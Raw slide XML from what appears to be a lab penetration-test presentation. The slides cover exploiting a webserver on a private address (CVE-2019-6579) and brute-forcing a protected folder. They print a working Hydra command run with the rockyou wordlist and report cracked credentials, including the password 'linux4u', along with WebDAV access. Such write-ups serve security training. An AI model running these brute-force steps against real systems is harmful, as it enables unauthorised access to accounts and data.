                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A20FFCD-24C5-463E-8C53-1F9CB37A0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Picture 4" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D94B1CC-C505-4317-B482-CFFFF5F80F0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991226" y="1480525"/>
            <a:ext cx="3073261" cy="979610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA64F66C-B029-4047-83A6-EC4AA501DFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991226" y="2518527"/>
            <a:ext cx="3073261" cy="2467582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="895544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1"/>
            <a:ext cx="9168600" cy="652705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="182875" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Open Web Port (80) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2019-6579</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Continued)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="223611" y="724324"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="CC0000"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;p61"/>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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A20FFCD-24C5-463E-8C53-1F9CB37A09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descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCB26D0-98A6-4BEB-BA0B-010C99EE312D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939536" y="1262929"/>
            <a:ext cx="2288986" cy="1243400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B27FE7-AA5B-48E3-B2E1-3965F4F1C323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="79513" y="1257804"/>
            <a:ext cx="3723861" cy="3312695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6677E2-8FA6-4A78-B1D2-63B4EED34C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="79513" y="4570499"/>
            <a:ext cx="3723861" cy="460405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9ABC0ED-2608-4A41-A709-EBCD30EDF2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7168278" y="2571750"/>
            <a:ext cx="1835491" cy="2207974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD948C52-6E70-4725-A9D4-DF11B79B023C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3889513" y="2696817"/>
            <a:ext cx="1451115" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>WEBSERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C842047A-A3F4-4218-AC59-77640D993993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803373" y="3004594"/>
            <a:ext cx="3313043" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Navigating to the webserver at 192.168.1.105 was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>the next step. The screenshot shown is the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>webserver homepage, displaying company folders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Reading through the files located in these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>confirms the existence of a secret folder which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>needed to be accessed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2411308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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="2521582"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2371500" cy="2521582"/>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CA" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used Hydra which is already preinstalled on Kali Linux. I also required a password list –in this case I used rockyou.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ hydra -l ashton-P /root/Downloads/rockyou.txt -s 80 -f 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>A hash of the Ryan’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>password was found</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Password for Ashton was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>tested against the common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>password dictionary “rockyou”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access to the /secret_folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access to /webdav system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ryan’s password.dav was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>found: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5929346" y="88790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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E87AEA-4A73-4410-9369-7EB2461A3F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0F4DD672-4F54-4B5A-A471-0FD451F95F98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="165651" y="4669204"/>
            <a:ext cx="8704024" cy="163285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C043A08E-B329-4CBD-8A38-B3C51CFD4B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924550" y="1621156"/>
            <a:ext cx="3159012" cy="319719"/>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D5BBEE8A-7813-4F09-96F3-09B63F10E439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924549" y="1944883"/>
            <a:ext cx="3159011" cy="896328"/>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59C7D487-CB0A-4EF0-AE8F-F0D0E8464F30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
